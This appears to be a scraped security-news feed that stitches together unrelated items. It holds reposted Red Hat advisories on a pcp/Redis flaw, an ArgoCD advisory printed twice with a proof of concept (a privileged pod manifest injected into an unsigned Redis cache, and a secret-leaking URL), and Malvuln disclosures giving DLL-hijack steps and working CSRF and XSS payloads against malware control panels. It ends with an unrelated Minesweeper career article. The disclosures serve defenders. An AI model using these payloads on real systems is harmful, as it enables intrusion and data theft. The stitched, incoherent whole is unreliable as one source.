Red Hat Security Advisory 2024-3323-03 - An update for pcp is now available for Red Hat Enterprise Linux 8.4 Advanced Mission Critical Update Support, Red Hat Enterprise Linux 8.4 Telecommunications Update Service, and Red Hat Enterprise Linux 8.4 Update Services for SAP Solutions.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_3323.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Important: pcp security updateAdvisory ID:        RHSA-2024:3323-03Product:            Red Hat Enterprise LinuxAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:3323Issue date:         2024-05-23Revision:           03CVE Names:          CVE-2024-3019====================================================================Summary: An update for pcp is now available for Red Hat Enterprise Linux 8.4 Advanced Mission Critical Update Support, Red Hat Enterprise Linux 8.4 Telecommunications Update Service, and Red Hat Enterprise Linux 8.4 Update Services for SAP Solutions.Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:Performance Co-Pilot (PCP) is a suite of tools, services, and libraries for acquisition, archiving, and analysis of system-level performance measurements. Its light-weight distributed architecture makes it particularly well-suited to centralized analysis of complex systems.Security Fix(es):* pcp: exposure of the redis server backend allows remote command execution via pmproxy (CVE-2024-3019)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2024-3019References:https://access.redhat.com/security/updates/classification/#importanthttps://bugzilla.redhat.com/show_bug.cgi?id=2271898

Red Hat Security Advisory 2024-3323-03

Red Hat Security Advisory 2024-3322-03 - An update for pcp is now available for Red Hat Enterprise Linux 8.8 Extended Update Support.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_3322.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Important: pcp security updateAdvisory ID:        RHSA-2024:3322-03Product:            Red Hat Enterprise LinuxAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:3322Issue date:         2024-05-23Revision:           03CVE Names:          CVE-2024-3019====================================================================Summary: An update for pcp is now available for Red Hat Enterprise Linux 8.8 Extended Update Support.Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:Performance Co-Pilot (PCP) is a suite of tools, services, and libraries for acquisition, archiving, and analysis of system-level performance measurements. Its light-weight distributed architecture makes it particularly well-suited to centralized analysis of complex systems.Security Fix(es):* pcp: exposure of the redis server backend allows remote command execution via pmproxy (CVE-2024-3019)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2024-3019References:https://access.redhat.com/security/updates/classification/#importanthttps://bugzilla.redhat.com/show_bug.cgi?id=2271898

Red Hat Security Advisory 2024-3322-03

Red Hat Security Advisory 2024-3321-03 - An update for pcp is now available for Red Hat Enterprise Linux 9.2 Extended Update Support.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_3321.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Important: pcp security updateAdvisory ID:        RHSA-2024:3321-03Product:            Red Hat Enterprise LinuxAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:3321Issue date:         2024-05-23Revision:           03CVE Names:          CVE-2024-3019====================================================================Summary: An update for pcp is now available for Red Hat Enterprise Linux 9.2 Extended Update Support.Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:Performance Co-Pilot (PCP) is a suite of tools, services, and libraries for acquisition, archiving, and analysis of system-level performance measurements. Its light-weight distributed architecture makes it particularly well-suited to centralized analysis of complex systems.Security Fix(es):* pcp: exposure of the redis server backend allows remote command execution via pmproxy (CVE-2024-3019)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2024-3019References:https://access.redhat.com/security/updates/classification/#importanthttps://bugzilla.redhat.com/show_bug.cgi?id=2271898

Red Hat Security Advisory 2024-3321-03

### Summary
By default, the Redis database server is not password-protected. Consequently, an attacker with access to the Redis server can gain read/write access to the data in Redis. The attacker can also modify the "mfst" (manifest) key to cause ArgoCD to execute any deployment, potentially leveraging ArgoCD's high privileges to take over the cluster. Updating the "cacheEntryHash" in the manifest JSON is necessary, but since it doesn't use a private key for signing its integrity, a simple script can generate a new FNV64a hash matching the new manifest values. The repo-server, unable to verify if its cache is compromised, will read the altered "mfst" key and initiate an update process for the injected deployment.

It's also possible to edit the "app|resources-tree" key, causing the ArgoCD server to load any Kubernetes resource into the live manifest section of the app preview. This could lead to an information leak.

The fact that the cache in Redis is neither signed nor validated, combined with Redis's default lack of password protection, presents a significant security concern given ArgoCD's high-level permissions within the cluster. A security update should ensure all Redis database values are signed or encrypted.


### Details
We began by deploying ArgoCD on an EKS cluster. Surprisingly, we discovered that an unprivileged pod in a different namespace on the same cluster could connect to the Redis server on port 6379. This was unexpected, as we had observed network policy rules restricting access to the Redis server to only the pods application-controller, repo-server, and argocd-server. We later realized that, despite having installed the latest version of the VPC CNI plugin on the EKS cluster, it requires manual enablement through configuration to enforce network policies. This raises concerns that many clients might unknowingly have open access to their Redis servers. We also know your recommendation on this page [Argo CD - Secret Management](https://argo-cd.readthedocs.io/en/stable/operator-manual/secret-management/#mitigating-risks-of-secret-injection-plugins), to enable the network policy plugin.
Further investigation revealed that any pod within my cluster could connect to the Redis server by resolving its address using the Kubernetes DNS server. Exploring the contents of the Redis server, we found that we could edit the 'mfst' value of the latest revision. By updating the “cacheEntryHash”, we made the repo-server accept it as a legitimate cache, leading ArgoCD to apply this configuration.
These tests were conducted using the default configuration, with regular ArgoCD and ArgoCD via helm deployment. This scenario presents a viable attack path, enabling any pod with access to the cluster to potentially exploit ArgoCD's high permissions and take over the cluster. We believe there is a critical need to enhance the security of the cache and its components. Given that many clients likely use ArgoCD in a plug-and-play manner, they could be exposed to significant risk. I am willing to offer assistance or answer any questions you might have.


### PoC
We tested this using the latest version of ArgoCD, configured with default settings. ArgoCD was installed either by applying a YAML file or through Helm. We wrote a few Go programs to decompress the Redis values and regenerate the "cacheEntryHash", but these programs were relatively straightforward.

To modify the cluster deployment, you can alter the "mfst" key of the latest revision. For instance, add the following line:

```json
{"apiVersion":"apps/v1","kind":"Deployment","metadata":{"labels":{"app.kubernetes.io/instance":"myapp1"},"name":"everything-allowed"},"spec":{"replicas":1,"selector":{"matchLabels":{"app":"everything-allowed"}},"template":{"metadata":{"labels":{"app":"everything-allowed"}},"spec":{"containers":[{"args":["while true; do sleep 30; done;"],"command":["/bin/sh","-c","--"],"image":"ubuntu","name":"everything-allowed-pod","securityContext":{"privileged":true},"volumeMounts":[{"mountPath":"/host","name":"noderoot"}]}],"hostIPC":true,"hostNetwork":true,"hostPID":true,"volumes":[{"hostPath":{"path":"/"},"name":"noderoot"}]}}}
```

This addition creates a highly privileged pod.

To cause the web page to load a different Kubernetes resource in the "Live Manifest", edit the "app|resources-tree" manifest. Modify one of the component's kind, namespace, and name. Upon reloading the web page and clicking on the newly created asset, an error message appears: "Unable to load data: argocd-secret not found as part of application myapp." However, the resource's description is still transmitted to the browser, as seen in this URL format:

```
https://127.0.0.1:8081/api/v1/applications/myapp/resource?name=argocd-secret&appNamespace=argocd&namespace=argocd&resourceName=argocd-secret&version=v1&kind=Secret&group=
```

This situation results in information leakage.

### Impact
This vulnerability could lead to Privilege Escalation to the level of cluster controller, or to information leakage, affecting anyone who does not have strict access controls on their Redis instance.

**Summary**

By default, the Redis database server is not password-protected. Consequently, an attacker with access to the Redis server can gain read/write access to the data in Redis. The attacker can also modify the "mfst" (manifest) key to cause ArgoCD to execute any deployment, potentially leveraging ArgoCD's high privileges to take over the cluster. Updating the "cacheEntryHash" in the manifest JSON is necessary, but since it doesn't use a private key for signing its integrity, a simple script can generate a new FNV64a hash matching the new manifest values. The repo-server, unable to verify if its cache is compromised, will read the altered "mfst" key and initiate an update process for the injected deployment.

It's also possible to edit the "app|resources-tree" key, causing the ArgoCD server to load any Kubernetes resource into the live manifest section of the app preview. This could lead to an information leak.

The fact that the cache in Redis is neither signed nor validated, combined with Redis's default lack of password protection, presents a significant security concern given ArgoCD's high-level permissions within the cluster. A security update should ensure all Redis database values are signed or encrypted.

**Details**

We began by deploying ArgoCD on an EKS cluster. Surprisingly, we discovered that an unprivileged pod in a different namespace on the same cluster could connect to the Redis server on port 6379. This was unexpected, as we had observed network policy rules restricting access to the Redis server to only the pods application-controller, repo-server, and argocd-server. We later realized that, despite having installed the latest version of the VPC CNI plugin on the EKS cluster, it requires manual enablement through configuration to enforce network policies. This raises concerns that many clients might unknowingly have open access to their Redis servers. We also know your recommendation on this page Argo CD - Secret Management, to enable the network policy plugin.  
Further investigation revealed that any pod within my cluster could connect to the Redis server by resolving its address using the Kubernetes DNS server. Exploring the contents of the Redis server, we found that we could edit the 'mfst' value of the latest revision. By updating the “cacheEntryHash”, we made the repo-server accept it as a legitimate cache, leading ArgoCD to apply this configuration.  
These tests were conducted using the default configuration, with regular ArgoCD and ArgoCD via helm deployment. This scenario presents a viable attack path, enabling any pod with access to the cluster to potentially exploit ArgoCD's high permissions and take over the cluster. We believe there is a critical need to enhance the security of the cache and its components. Given that many clients likely use ArgoCD in a plug-and-play manner, they could be exposed to significant risk. I am willing to offer assistance or answer any questions you might have.

**PoC**

We tested this using the latest version of ArgoCD, configured with default settings. ArgoCD was installed either by applying a YAML file or through Helm. We wrote a few Go programs to decompress the Redis values and regenerate the "cacheEntryHash", but these programs were relatively straightforward.

To modify the cluster deployment, you can alter the "mfst" key of the latest revision. For instance, add the following line:

{"apiVersion":"apps/v1","kind":"Deployment","metadata":{"labels":{"app.kubernetes.io/instance":"myapp1"},"name":"everything-allowed"},"spec":{"replicas":1,"selector":{"matchLabels":{"app":"everything-allowed"}},"template":{"metadata":{"labels":{"app":"everything-allowed"}},"spec":{"containers":\[{"args":\["while true; do sleep 30; done;"\],"command":\["/bin/sh","\-c","\--"\],"image":"ubuntu","name":"everything-allowed-pod","securityContext":{"privileged":true},"volumeMounts":\[{"mountPath":"/host","name":"noderoot"}\]}\],"hostIPC":true,"hostNetwork":true,"hostPID":true,"volumes":\[{"hostPath":{"path":"/"},"name":"noderoot"}\]}}}

This addition creates a highly privileged pod.

To cause the web page to load a different Kubernetes resource in the "Live Manifest", edit the "app|resources-tree" manifest. Modify one of the component's kind, namespace, and name. Upon reloading the web page and clicking on the newly created asset, an error message appears: "Unable to load data: argocd-secret not found as part of application myapp." However, the resource's description is still transmitted to the browser, as seen in this URL format:

    https://127.0.0.1:8081/api/v1/applications/myapp/resource?name=argocd-secret&appNamespace=argocd&namespace=argocd&resourceName=argocd-secret&version=v1&kind=Secret&group=
    

This situation results in information leakage.

**Impact**

This vulnerability could lead to Privilege Escalation to the level of cluster controller, or to information leakage, affecting anyone who does not have strict access controls on their Redis instance.

**References**

*   GHSA-9766-5277-j5hr
*   argoproj/argo-cd@2de0cea
*   argoproj/argo-cd@35a7d6c
*   argoproj/argo-cd@4e2fe30
*   argoproj/argo-cd@53570cb
*   argoproj/argo-cd@6ef7b62
*   argoproj/argo-cd@9552034
*   argoproj/argo-cd@bdd889d
*   argoproj/argo-cd@f1a449e

GHSA-9766-5277-j5hr: ArgoCD Vulnerable to Use of Risky or Missing Cryptographic Algorithms in Redis Cache

TrojanSpy.Win64.EMOTET.A malware suffers from a code execution vulnerability.

    Discovery / credits: Malvuln (John Page aka hyp3rlinx) (c) 2024Original source: https://malvuln.com/advisory/f917c77f60c3c1ac6dbbadbf366ddd30.txtContact: malvuln13@gmail.comMedia: twitter.com/malvulnThreat: TrojanSpy.Win64.EMOTET.A Vulnerability: Arbitrary Code ExecutionDescription: The malware looks for and executes a x64-bit "CRYPTBASE.dll" PE file in its current directory. Therefore, we can hijack the DLL and execute our own code to intercept and terminate the malware. Once loaded the exploit dll will check if the current directory is "C:\Windows\System32", if not we grab our process ID and terminate. Leverage RansomLord v3 for DLL generation, while written as a proof-of-concept to specifically defeat ransomware, it can also be used to generate DLLs to try an exploit other types of malwares. All basic tests were conducted successfully in a virtual machine environment.Family: EMOTETType: PE64MD5: f917c77f60c3c1ac6dbbadbf366ddd30SHA256: b76fbc81bbb7f3108d27d9da9e2646aeb3769fba62bf7961f79306812de3486cVuln ID: MVID-2024-0684Disclosure: 05/14/2024Exploit/PoC:1) Download RansomLord v3    https://github.com/malvuln/RansomLord2) Locate the x64 CRYPTBASE.dll entry using the -m flag (DLL Map)3) Use -g flag (Generate Exploit) to output an x64 DLL CRYPTBASE.dll, based on an existing vulnerable malware in the victims list.4) (Optional) -e flag to setup Windows event IOC logging in the registry, this will log the SHA256 hash, full path and filename.Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).

TrojanSpy.Win64.EMOTET.A MVID-2024-0684 Code Execution

Backdoor.Win32.AsyncRat malware suffers from a code execution vulnerability.

    Discovery / credits: Malvuln (John Page aka hyp3rlinx) (c) 2024Original source: https://malvuln.com/advisory/2337b9a12ecf50b94fc95e6ac34b3ecc.txtContact: malvuln13@gmail.comMedia: twitter.com/malvulnThreat: Backdoor.Win32.AsyncRatVulnerability: Arbitrary Code ExecutionDescription: The malware looks for and executes a x32-bit "CRYPTSP.dll" PE file in its current directory. Therefore, we can hijack the DLL and execute our own code to intercept and terminate the malware. Once loaded the exploit dll will check if the current directory is "C:\Windows\System32", if not we grab our process ID and terminate. Leverage RansomLord v3 for DLL generation, while written as a proof-of-concept to specifically defeat ransomware, it can also be used to generate DLLs to try an exploit other types of malwares. All basic tests were conducted successfully in a virtual machine environment.Family: AsyncRatType: PE32MD5: 2337b9a12ecf50b94fc95e6ac34b3eccSHA256: 3c703ecb3e8c54e352ff39fadbe789bb2313f848bd69551b07bf2ed0a58744b9Vuln ID: MVID-2024-0683Disclosure: 05/14/2024Exploit/PoC:1) Download RansomLord v3    https://github.com/malvuln/RansomLord2) Locate the x32 CRYPTSP.dll entry using the -m flag (DLL Map)3) Use -g flag (Generate Exploit) to output an x32 DLL CRYPTSP.dll, based on an existing vulnerable malware in the victims list.4) (Optional) -e flag to setup Windows event IOC logging in the registry, this will log the SHA256 hash, full path and filename.Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).

Backdoor.Win32.AsyncRat MVID-2024-0683 Code Execution

Panel.SmokeLoader malware suffers from cross site request forgery, and cross site scripting vulnerabilities.

**Panel.SmokeLoader MVID-2024-0682 Cross Site Request Forgery / Cross Site Scripting**

    Discovery / credits: Malvuln (John Page aka hyp3rlinx) (c) 2024Original source: https://malvuln.com/advisory/4b5fc3a2489985f314b81d35eac3560f_B.txtContact: malvuln13@gmail.comMedia: twitter.com/malvulnThreat: Panel.SmokeLoader Vulnerability: Cross Site Request Forgery (CSRF) - Persistent XSSFamily: SmokeLoader Type: Web Panel MD5: 4b5fc3a2489985f314b81d35eac3560f  (control.php)SHA256: 8d02238577081be74b9ebc1effcfbf3452ffdb51f130398b5ab875b9bfe17743Vuln ID: MVID-2024-0682Disclosure: The smokebot admin web panel is written in PHP for remote administration capability.The panel has multiple features like Bot List, Task List, Stealer, Miner, Email Grab, KeyLogger etc. The "control.php" PHP page contains an HTML FORM using POST method, however there is no CSRF security token used by the FORM. This is a unique token per session within the FORM, used as a challenge to the server to help prevent cross-site-scripting attacks. Therefore, third-party adversaries who can lure a panel user to visit an attacker controlled webpage or click an infected link may result in the panel users submitting FORMS on an attackers behalf. This may result in code execution, data theft, GEO location disclosure. The CSRF to XSS results in stored JS payload in the smoke MySQL database table "plugins".hash   fgfilter   fakedns_rules   filesearch_rules   procmon_rules   ddos_rules   keylog_rules   fgcookies   miner_rules   93666df0833e0b63917e5373812613               0   ""/%3E%3Cscript%3Ewindow.open("https://www.malvuln.com/l...Exploit/PoC:1) CSRF to add your own Miner Pool%3Cform method="post" action="http://127.0.0.1/Panel.SmokeLoader/SmokeLoader/Smoke/control1.php?page=miner"%3EPool: %3Cinput type="input" name="miner_pool" size="30" value="MyPoolFool:666"%3E Login: %3Cinput type="input" name="miner_login" size="20" value="gg"%3EPassword: %3Cinput type="input" name="miner_pass" size="20" value="malvuln"%3E%3Cinput type="hidden" name="mode" value="miner"%3E%3Cinput type="submit" value="SAVE"%3E%3Cscript%3Edocument.forms[0].submit()%3C/script%3E%3C/form%3E2) CSRF to Persistent XSS%3Cform method="post" action="http://127.0.0.1/Panel.SmokeLoader/SmokeLoader/Smoke/control1.php?page=miner"%3EPool: %3Cinput type="input" name="miner_pool" size="300" value='""/%3E%3Cscript%3Ewindow.open("https://www.malvuln.com/log.php")%3C/script%3E"'%3E Login: %3Cinput type="input" name="miner_login" size="20" value="gg"%3EPassword: %3Cinput type="input" name="miner_pass" size="20" value="malvuln"%3E%3Cinput type="hidden" name="mode" value="miner"%3E%3Cinput type="submit" value="SAVE"%3E%3Cscript%3Edocument.forms[0].submit()%3C/script%3E%3C/form%3EDisclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).

Panel.SmokeLoader MVID-2024-0682 Cross Site Request Forgery / Cross Site Scripting

Panel.SmokeLoader malware suffers from a cross site scripting vulnerability.

    Discovery / credits: Malvuln (John Page aka hyp3rlinx) (c) 2024Original source: https://malvuln.com/advisory/4b5fc3a2489985f314b81d35eac3560f.txtContact: malvuln13@gmail.comMedia: twitter.com/malvulnThreat: Panel.SmokeLoader Vulnerability: Cross Site Scripting (XSS)Family: SmokeLoader Type: Web Panel MD5: 4b5fc3a2489985f314b81d35eac3560f  (control.php)SHA256: 8d02238577081be74b9ebc1effcfbf3452ffdb51f130398b5ab875b9bfe17743Vuln ID: MVID-2024-0681Disclosure: 05/11/2024Description: The smokebot admin web panel is written in PHP for remote administration capability. The panel has multiple features like Bot List, Task List, Stealer, Miner, Email Grab, KeyLogger etc. The "control.php" PHP page contains an HTML FORM that uses $_SERVER["PHP_SELF"] for the form action method. This is a super global variable that returns the filename of the currently executing script. There is no secure coding practices of filtering input or sanitization of output e.g "htmlspecialchars()". Therefore, panel users who visit a third-party adversary website or click an infected link, can trigger arbitrary client side JS code execution in the security context of the current user. This can result in data theft or GEO location disclosure of the user accessing the smokebot web interface.PHP snippet.if ($_GET["mode"] === "reports"){   $url_pattern = $_GET["logs_sru"];   $id_pattern = $_GET["logs_sri"];$action = $_SERVER["PHP_SELF"]."?page=stealer&mode=reports";%3Cform method=\"get\" action=\"{$action}\"%3EInterestingly, they use PHP function htmlspecialchars() when retrieving data from the "smoke bot" MySQL database.$r = mysqli_query($dbcon,"SELECT * FROM `stealer` WHERE `cname`='{$id}'");   while ($v = mysqli_fetch_assoc($r)){   $stealer_host = htmlspecialchars($v["host"]);However, it doesn't wrap $_SERVER["PHP_SELF"] on the action method for the FORM {$action} variable that handles user input.Exploit/PoC:1) http://x.x.x.x/SmokeLoader/control1.php?page=stealer&mode=reports&logs_sri=%22/%3E%3Cscript%3Ewindow.open("https://malvuln.com")%3C/script%3E&logs_sru=&next=12) http://x.x.x.x/SmokeLoader/control1.php?page=fgrab&mode=reports&forms_sri=%22/%3E%3Cscript%3Ealert((document.cookie)%3C/script%3E3) http://x.x.x.x/SmokeLoader/control1.php?page=fgrab&mode=reports&forms_sru=%22/%3E%3Cscript%3Ewindow.open('https://hyp3rlinx.altervista.org/')%3C/script%3E4) http://x.x.x.x/SmokeLoader/control1.php?page=fgrab&mode=reports&forms_srd=%22/%3E%3Cscript%3Ealert(%22malvuln%22)%3C/script%3EDisclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).

Panel.SmokeLoader MVID-2024-0681 Cross Site Scripting

Panel Amadey.d.c malware suffers from cross site scripting vulnerabilities.

    Discovery / credits: Malvuln (John Page aka hyp3rlinx) (c) 2024Original source: https://malvuln.com/advisory/50467c891bf7de34d2d65fa93ab8b558.txtContact: malvuln13@gmail.comMedia: twitter.com/malvulnThreat: Panel Amadey.d.cVulnerability: Cross Site Scripting (XSS)Family: AmadeyType: Web PanelMD5: 50467c891bf7de34d2d65fa93ab8b558 (Login.php)SHA256: 65623eead2bcba66817861246e842386d712c38c5c5558e50eb49cffa2a1035dVuln ID: MVID-2024-0680Disclosure: 05/09/2024Description: The Amadey C2 web panel is written in PHP for remote administration capability. The Login.php webpage accepts HTTP GET "l" and "p" parameters which are passed to the backend server side code: $_GET["l"]  name=\"login\",  $_GET["p"] , name=\"password\". However, there is no secure coding practice of filtering input or sanitization of output. Panel users who visit a third-party attacker website or click an infected link, can trigger arbitrary client side JS code execution in the security context of the current user. This can result in data theft or GEO location disclosure of the user accessing the Amadey web interface.The submit button contains the text "Unlock".Entering incorrect password results in URI of "?wrong=1" and displays "Wrong login or password", after a few seconds delay redirects back to Login.php.http://127.0.0.1/Panel.Amadey.d.c/Login.php?wrong=1Wrong login or passwordThe web panel HTML source code for the URL "Login.php?wrong=1" contains the letters "CC" plus the Domain/IP within brackets[x.x.x.x] within the HTML title tag. %3Ctitle%3E CC [127.0.0.1] %3C/title%3ETested successfully in Firefox.Exploit/PoC:Vulnerable parameters: "l" and "p"http://x.x.x.x/Panel.Amadey.d.c/Login.php?l=%22/%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ehttp://x.x.x.x/Panel.Amadey.d.c/Login.php?p=%22/%3E%3Cscript%3Ealert(666)%3C/script%3EDisclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).

Panel Amadey.d.c MVID-2024-0680 Cross Site Scripting

By Uzair Amir
Remember Minesweeper? It's not just a game - it's a hidden training ground for work skills! Sharpen your decision-making, focus, and strategic thinking with every click.
This is a post from HackRead.com Read the original post: A Mind at Play: Rediscovering Minesweeper in the Professional Arena

Do you remember the first time you stumbled upon Minesweeper online? It could be during a lazy afternoon at a school computer lab or a quick break at your first job. Something about that grid of grey squares beckons like a puzzle waiting to be solved—a momentary escape that, surprisingly, could be one of your best tools for professional growth today.

****The Puzzle of Decision-Making****

Imagine you’re back in that chair, the mouse under your fingertips. Each click in Minesweeper isn’t just a guess; it’s a decision with risks and rewards that are not unlike the choices you face in your career.

Like navigating through a particularly tricky business dilemma, each square you uncover on the Minesweeper grid teaches you more about the landscape, helping you make the next decision more informed. It’s a dance of logic and anticipation—skills that, when refined, translate into a sharp acumen for analyzing complex professional scenarios.

Remember that feeling when you correctly predict a mine’s location? That’s your analytical skills growing more strong, one click at a time.

****A Masterclass in Focus****

Now, think about the intense concentration Minesweeper demands. Each square could mean triumph or game over, akin to the high stakes of missing a critical detail in a client report or a coding error in a software launch.

This game hones your ability to focus and pay attention to the minutiae—skills that elevate the quality of your work and your productivity. The game’s grid challenges you to spot inconsistencies and patterns, just as in a complex dataset or a crucial project blueprint.

****Strategizing Several Steps Ahead****

Strategic foresight in Minesweeper involves planning several moves, assessing potential outcomes, and managing risks—essential for effective project management and long-term planning in the professional realm. Playing Minesweeper cultivates a mindset that values strategic preparation and adaptability, preparing you to steer projects and negotiations toward success.

****Unwind and Adapt****

Beyond sharpening your technical skills, Minesweeper is a refuge from the daily grind. The familiar grid offers a structured yet soothing distraction that can help clear your mind, akin to meditation. It’s not just about escaping stress but about adapting to it and managing it—key for sustaining performance during crunch times at work.

Moreover, the mental flexibility needed to toggle between strategies in the game mirrors the rapid switching between tasks that’s common in today’s workplace, enhancing your cognitive agility.

****Ready at Your Fingertips****

One of the most significant benefits of Minesweeper is its accessibility. Whether you have a ten-minute break or just a few moments between meetings, it can engage your brain without a substantial time investment. These short bursts of cognitive exercise can strengthen mental agility, fostering a strong cognitive reserve that enhances career longevity and success.

****Conclusion: More Than Just a Game****

As you integrate Minesweeper into your daily routine, you’ll find it’s more than nostalgic play; it’s a deliberate practice in cognitive enhancement. Each game is a step towards becoming a sharper, more attentive, and strategic professional. So, next time you need a break, consider spending it with Minesweeper—not just for fun but also for your professional development.

Rediscovering Minesweeper in this light might change how you view every click—as clearing mines and planting seeds for a more robust professional future.

1.  4 Best War Games You Should Play
2.  12 Classic Games You Can Play on Your Smartphone
3.  The Best FPS Games on Android: Popular by Demand
4.  5 Casual Games You Can Play on Your Mobile Browser Now
5.  Run Windows 95 on your Mac, Linux and Windows 10 devices

Tag

#redis